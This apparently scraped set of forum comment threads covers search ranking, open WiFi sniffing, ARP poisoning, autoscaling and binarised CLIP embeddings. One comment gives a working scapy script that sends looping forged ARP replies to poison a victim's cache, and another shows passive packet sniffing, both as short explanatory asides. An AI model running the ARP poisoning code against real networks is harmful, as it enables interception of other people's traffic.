
I would love to know how some of these APIs work internally.


The code is open source, in case you are interested in reading it!

https://github.com/capjamesg/nanosearch/blob/main/nanosearch...

At a high level, the algorithm works like this:

  1. You provide a sitemap.
  2. All URLs in the sitemap are downloaded.
  3. The HTML from each URL is read, extracting the page title, description, and contents.
  4. The contents are indexed using a search algorithm. This tool supports TF/IDF and BM25, two commonly used ranking algorithms. I use existing Python packages that implement them, since these algorithms have been implemented reliably by many people.
  5. A link graph is calculated that tracks all links between all pages.
  6. When you run a search, the algorithm you chose (BM25 or TF/IDF) runs to find related documents. This is a keyword search. Then, results are weighted by the number of links pointing to each page. This weight is useful if a site talks a lot about topics with the same keywords; by using links as a ranking factor, posts that are more connected to others are elevated in search. Google pioneered the idea that links are "votes" on the relevance of content (although this tool doesn't use PageRank like Google).
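
To make steps 4 and 6 concrete, here is a rough sketch of the ranking idea in Python (not the actual nanosearch code; the documents, link counts, and the exact boosting formula are made up for illustration, using the rank_bm25 package):

  from rank_bm25 import BM25Okapi

  docs = {
      "https://example.com/pour-over": "coffee brewing guide for pour over",
      "https://example.com/roasting": "notes on coffee roasting at home",
      "https://example.com/hiking": "my favourite hiking trails",
  }
  # How many other pages on the site link to each URL (the link graph).
  inbound_links = {"https://example.com/pour-over": 4,
                   "https://example.com/roasting": 1,
                   "https://example.com/hiking": 0}

  urls = list(docs)
  bm25 = BM25Okapi([docs[u].split() for u in urls])

  def search(query):
      keyword_scores = bm25.get_scores(query.split())
      # Boost by inbound link count; +1 so unlinked pages still rank.
      return sorted(zip(urls, keyword_scores),
                    key=lambda pair: pair[1] * (1 + inbound_links[pair[0]]),
                    reverse=True)

  print(search("coffee"))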


How can we capture unencrypted packets from the network? I thought you had to run tcpdump or something like that to be able to do that. But you won't be able to run tcpdump if you don't have access to the interface (source or destination), no?


I'm speaking in the context of the parent conversation ("unencrypted WiFi packets"). On wireless networks, all devices share the same "wire", so to speak. Normally that traffic is useless when captured due to encryption, but that's not the case on unencrypted (i.e. public) WiFi.
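
To make that concrete, a passive capture might look something like this with scapy (just a sketch; "wlan0mon" is a placeholder for a wireless card already in monitor mode, and you generally need root):

  from scapy.all import sniff, Dot11

  def show(pkt):
      # On an open network the 802.11 payloads are not encrypted,
      # so any nearby radio can read them.
      if pkt.haslayer(Dot11):
          print(pkt.addr2, "->", pkt.addr1, len(pkt), "bytes")

  sniff(iface="wlan0mon", prn=show, count=20)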


It doesn't matter if the wifi is encrypted or not. All that matters is that you share the network with an attacker. You can ARP poison just fine, encrypted or open, wifi or wired.
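
For illustration, the mechanism is just forged ARP replies, which a tool like scapy can send in a few lines (a sketch only; the IPs and MAC below are placeholders, and you should only try this on a network you own):

  from scapy.all import ARP, send

  forged = ARP(op=2,                       # op=2 is an ARP "is-at" reply
               psrc="192.168.1.1",         # gateway IP being impersonated
               pdst="192.168.1.42",        # victim IP
               hwdst="aa:bb:cc:dd:ee:ff")  # victim MAC
  # hwsrc defaults to the attacker's own MAC, so the victim's ARP cache
  # now maps the gateway IP to the attacker.
  send(forged, loop=1, inter=2)            # keep refreshing every 2 seconds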


Well, actually... you can only successfully launch an ARP poisoning attack if you're on the same network segment as the impersonated host.

(Yes, I am indeed being pedantic on purpose to prove a point. I offer this parenthetical to you in place of an apology)


Won't there be more noise when predicting just 20s in advance? The longer the window, the less we see the effects of temporary events like network blips, no? Sorry, I'm new to software engineering and just trying to learn.


However, with a smaller prediction interval you can dampen your autoscaling more. If you predict 20s into the future, react, and 20s later see how that changed the situation, you only need to spin a few instances up or down every 20s. If you have to predict 5m into the future, you might have to take much stronger actions, because any effect is delayed by the 5m startup interval.
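
A toy sketch of that trade-off (all numbers invented for illustration):

  def instances_needed(predicted_rps, rps_per_instance=100):
      return -(-predicted_rps // rps_per_instance)  # ceiling division

  current = instances_needed(1_050)        # 11 instances running now

  # 20s horizon: small, frequent corrections; observe and adjust again.
  short_horizon = instances_needed(1_150)  # 12 instances -> add 1

  # 5m horizon: the forecast is less certain and any correction is
  # delayed by the startup time, so you provision for the worst
  # plausible case and overshoot more.
  long_horizon = instances_needed(1_800)   # 18 instances -> add 7

  print(current, short_horizon, long_horizon)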


There’s no one answer for it, you need to learn your traffic / resource usage patterns and tune the scaling to match your situation.

No shortcuts really, although a lot of web applications behave “kinda” similarly.

Start conservatively and tweak from there.


Faster feedback is the shortcut. And it always works. Faster boot time is lower latency to serve the queue. Faster feedback is stabilising.


I went through the post and I have absolutely no clue what this person is talking about. But I want to be in a place where I can understand what the person is saying.

How can I reach that point? I was lost at quantized, could understand bit packing, and was even more lost when the author started talking about things like Hamming Distance.

Please help me out. I want to grow my career in this direction.


First you need to understand embeddings, and CLIP. I have a detailed guide here that should help you with that: https://simonwillison.net/2023/Oct/23/embeddings/

Then you need to understand binarization. This is a surprisingly effective trick based on the observation that if you have an embedding vector of, say, 1,000 numbers, for many models those numbers will be very small floating point values just above or below zero.

It turns out you can turn those thousand floating point numbers into one thousand single bits where each bit simply represents if the value is above or below zero... and the embedding magic mostly still works!

And instead of the usual cosine distance, you can use a much faster hamming distance function to compare two vectors.
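
A quick sketch of that trick with numpy (random vectors just for illustration):

  import numpy as np

  vec_a = np.random.randn(1000).astype(np.float32)  # 4,000 bytes
  vec_b = np.random.randn(1000).astype(np.float32)

  bits_a = np.packbits(vec_a > 0)                   # 125 bytes
  bits_b = np.packbits(vec_b > 0)

  # Hamming distance: count differing bits via XOR + popcount.
  hamming = int(np.unpackbits(bits_a ^ bits_b).sum())
  print(vec_a.nbytes, "bytes ->", bits_a.nbytes, "bytes; distance:", hamming)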

Once you understand embedding vectors and CLIP that should hopefully make sense.


The part of CLIP[1] that you need to know to understand this is that it embeds text and images into the same space, i.e. the word "dog" is close to images of dogs. Normally this space is a high-dimensional real space; think 512 dimensions, or 512 floating point numbers. When you want to measure "closeness" between vectors in this space, cosine similarity[2] is a natural choice.

Why would you want to quantize values? Well, instead of using a 32-bit float for each dimension, what if you could get away with 1 bit? That would save you 31 of every 32 bits. Often you'll want to embed millions or billions of pieces of text or images, so that represents a huge speed and cost saving, and if accuracy isn't impacted too much then it could be worth it.

If you naively binarize the floats of an existing model, it severely impacts accuracy. However, if you train a model from scratch to produce binary outputs, it appears to perform better.

There is one twist. Deep learning models rely on gradient descent to train, and binary outputs don't produce useful gradients. We use cosine similarity on floating point vectors and hamming distance on bit vectors. Is there a function that behaves like hamming distance but is nicely differentiable? If so, we can use that function during training and vanilla hamming distance during inference. It seems like that's what they've done.
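
A hand-wavy sketch of one way that could work (I don't know exactly what they used; this is just to show the idea of a smooth stand-in for hamming distance during training):

  import torch

  def soft_hamming(a, b):
      # a, b are tanh activations in [-1, 1]; the elementwise product is
      # near +1 when signs agree and near -1 when they disagree, so this
      # approximates the count of mismatched bits and is differentiable.
      return 0.5 * (a.shape[-1] - (a * b).sum(dim=-1))

  a = torch.tanh(torch.randn(4, 512, requires_grad=True))
  b = torch.tanh(torch.randn(4, 512))
  loss = soft_hamming(a, b).mean()
  loss.backward()  # gradients flow, unlike with hard sign() bits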

I'd suggest playing around with OpenCLIP[3]. My background is in data science but all my CLIP knowledge comes from doing a side project over the course of a couple weekends.

1. https://huggingface.co/docs/transformers/model_doc/clip

2. https://en.wikipedia.org/wiki/Cosine_similarity

3. https://github.com/mlfoundations/open_clip

